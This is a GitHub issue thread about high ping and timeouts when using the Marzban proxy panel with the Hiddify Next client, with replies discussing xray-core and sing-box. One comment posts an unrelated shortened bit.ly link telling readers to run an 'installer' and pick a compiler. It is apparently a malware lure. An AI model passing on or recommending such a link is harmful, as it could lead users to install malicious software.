### ISSUE TITLE
Abnormally high ping when using Marzban

### ISSUE THREAD

**Issue by TheLastFlame** [Gozargah/Marzban#1294]
**Describe the bug**
Hiddify Next client writes Timeout on all attempts to determine ping. In speedtest with download ping is very bad (500-10000). I don't see this problem when using 3x-ui or Hiddify Manager on the same server. 

**To Reproduce**
Just install marzban with default settings

**Expected behavior**
Ping at the 3x-ui level

**Machine details (please complete the following information):**
 - OS: ubuntu 22.04
- Python version: 3.11.9
- Browser: Any

**Comment by 777Naity** [comment]
try this
https://bit.ly/4e4zLlq
select the desired compiler in the installer

**Comment by TheLastFlame** [comment]
I realise I've provided criminally little information, but I don't really understand what I need to open / look at to discover possible causes. This problem persists consistently with any of my attempts to install marzban. And it certainly wasn't like this six months ago. Perhaps the problem originated in one of the updates?
The most obvious manifestation of this -- Hiddify Next is unable to detect ping when using Marzban, on any of the protocols (unlike other panels).

I like marzban and want to use it. Unfortunately, I have to switch to 3x-ui. (hopefully temporarily).

**Comment by M03ED** [comment]
Marzban just run a xray-core to make connections, there should be no difference between them , also hiddify next use customized version of sing-box core and it's not a standard core, there are lot's of other applications you can use like sing-box and flclash

**Comment by TheLastFlame** [comment]
> Marzban just run a xray-core to make connections, there should be no difference between them , also hiddify next use customized version of sing-box core and it's not a standard core, there are lot's of other applications you can use like sing-box and flclash

Hiddify also has the option to use xray, but it doesn't make any difference. I have reset the server several times and installed different panels cleanly. In Marzban this problem is stable.

**Comment by erfjab** [comment]
The problem is not Marzban because hiddify installs other software itself, but Marzban provides you with everything.
